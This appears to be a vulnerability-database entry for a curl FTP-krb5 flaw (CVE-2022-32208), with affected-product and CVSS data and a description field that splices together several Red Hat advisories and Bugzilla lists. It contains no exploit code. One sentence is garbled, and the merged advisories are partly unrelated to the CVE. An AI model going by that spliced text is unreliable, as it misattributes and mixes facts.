ACM shows wrong path for Argo CD applicationset git generator (BZ# 2107885)
Single node checkbox not visible for 4.11 images (BZ# 2109134)
Unable to deploy hypershift cluster when enabling validate-cluster-security (BZ# 2109544)
Deletion of Application (including app related resources) from the console fails to delete PlacementRule for the application (BZ# 20110026)
After the creation by a policy of job or deployment (in case the object is missing)ACM is trying to add new containers instead of updating (BZ# 2117728)
pods in CrashLoopBackoff on 3.11 managed cluster (BZ# 2122292)
ArgoCD and AppSet Applications do not deploy to local-cluster (BZ# 2124707)
Bugs fixed (https://bugzilla.redhat.com/):

2074547 - Submariner Globalnet e2e tests failed on MTU between On-Prem to Public clusters 2082254 - OCP 4.11 - Install fails because of: pods "management-ingress-63029-5cf6789dd6-" is forbidden: unable to validate against any security context constraint 2083659 - subctl gather fails to gather libreswan data if CableDriver field is missing/empty in Submariner Spec 2086883 - Yaml editor for creating vSphere cluster moves to next line after typing 2090311 - Submariner addon status doesn't track all deployment failures 2091170 - Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn without including s3 secret 2095481 - After switching to ACM 2.5 the managed clusters log "unable to create ClusterClaim" errors 2100036 - Enforce failed and report the violation after modified memory value in limitrange policy 2101577 - Creating an application fails with "This application has no subscription match selector (spec.selector.matchExpressions)" 2102273 - Inconsistent cluster resource statuses between "All Subscription" topology and individual topologies 2103653 - managed cluster is in "unknown" state for 120 mins after OADP restore 2104553 - RHACM 2.5.2 images 2104961 - Subscription UI does not allow binding to label with empty value 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2106069 - Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD 2107134 - Region information is not available for Azure cloud in managedcluster CR 2107359 - cluster uninstall log points to incorrect container name 2107885 - ACM shows wrong path for Argo CD applicationset git generator 2109134 - Single node checkbox not visible for 4.11 images 2110026 - Deletion of Application (including app related resources) from the console fails to delete PlacementRule for the application 2117728 - After the creation by a policy of job or deployment (in case the object is missing)ACM is trying to add new containers instead of updating 2122292 - pods in CrashLoopBackoff on 3.11 managed cluster 2124707 - ArgoCD and AppSet Applications do not deploy to local-cluster 2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "_id": null,
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "_id": null,
        "model": "bootstrap os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "_id": null,
        "model": "curl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.16.4"
      },
      {
        "_id": null,
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "13.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "element software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "11.0"
      },
      {
        "_id": null,
        "model": "curl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.84.0"
      },
      {
        "_id": null,
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "_id": null,
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-32208"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168158"
      },
      {
        "db": "PACKETSTORM",
        "id": "168213"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "168289"
      },
      {
        "db": "PACKETSTORM",
        "id": "168503"
      },
      {
        "db": "PACKETSTORM",
        "id": "168378"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2022-32208",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2022-32208",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.0,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-424135",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "id": "CVE-2022-32208",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2022-32208",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2022-32208",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-424135",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424135"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32208"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32208"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "When curl \u003c 7.84.0 does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client. Harry Sintonen incorrectly handled certain file permissions. \nAn attacker could possibly use this issue to expose sensitive information. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: curl security update\nAdvisory ID:       RHSA-2022:6159-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:6159\nIssue date:        2022-08-24\nCVE Names:         CVE-2022-32206 CVE-2022-32208\n====================================================================\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: HTTP compression denial of service (CVE-2022-32206)\n\n* curl: FTP-KRB bad message verification (CVE-2022-32208)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\ncurl-7.61.1-22.el8_6.4.src.rpm\n\naarch64:\ncurl-7.61.1-22.el8_6.4.aarch64.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.aarch64.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\n\nppc64le:\ncurl-7.61.1-22.el8_6.4.ppc64le.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.ppc64le.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\n\ns390x:\ncurl-7.61.1-22.el8_6.4.s390x.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.s390x.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\n\nx86_64:\ncurl-7.61.1-22.el8_6.4.x86_64.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.i686.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.i686.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.x86_64.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-32206\nhttps://access.redhat.com/security/cve/CVE-2022-32208\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYwa9b9zjgjWX9erEAQi1rQ/+Kw4R4cPAIlGUx4vJwSMw8zwCDxnLviV+\nYgCpaCuUwCkWI9hrAQNC1O5i2MSl7j8jI9dt0Oe770VwNIZPzJMK8MX96zYdeOsg\nEiuwTW5KTWKwCeAvPt6ydVji9R0N7FMDBxmdi1aE8gBt8J6pIwp4ozrR4jXiXCjB\ndQJlc2kf7YXDiengte1jpXNCFh2ar9t8lqmW53Hu05zR8VFdAPk6NM1kTIploICN\nblR9t80TbWouBvN2A6gIZ0ZWnbJOY9odCBHdo5ay8kufmQC0K9QKb7jyoaUUHVau\n5/HVbncd7bFQuyu+yGoOxU1TCxwee3B9LAmR4uzDdJcaTxPgvK2cyskdTVz+9N9k\nnJLDYGaL7UNC7YkbByN58VC6fdGsnn8QIXHg7ICTgdhYiPZ3uP5JUiDrAGKKb/v+\nXPtwYHuh6yX0OfS0JqFEMjR0P1rFLiuDNBOPBDiTV2mBVd+7kiNTs1izUDGwQeFd\nVaNNNU4kpD3FGOgRwxIAKz2qCX+Ody8goBeJJPGcVlmDp025ZrMisl1QC8/3eTas\nML+TSvTeaSY/I35uPzKsoh1f+/lAwUsB54I6NxHH3vWYryievuSdpjtNsQInACjw\nowX+pU5CfOwdD56Hqdhb7fjuJVufo6VC8b0zy/vSZYnNt0cfojXA73F3B1K5+XcF\nbBkTeh+fqsg=powM\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.12 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity fix:\n\n* CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n\nBug fixes:\n\n* Remove 1.9.1 from Proxy Patch Documentation (BZ# 2076856)\n\n* RHACM 2.3.12 images (BZ# 2101411)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2076856 - [doc] Remove 1.9.1 from Proxy Patch Documentation\n2101411 - RHACM 2.3.12 images\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n\n5. Description:\n\nOpenShift Virtualization is Red Hat\u0027s virtualization solution designed for\nRed Hat OpenShift Container Platform. This advisory contains the following\nOpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache\n(CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n(CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header\n(CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions\n(CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled\noverflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect\naccess control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field\nelements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit\nX-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add\n(CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update nested support KBASE article\n2100679 - The number of hardware devices is not correct in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. \n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import \"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! (17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift  Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create 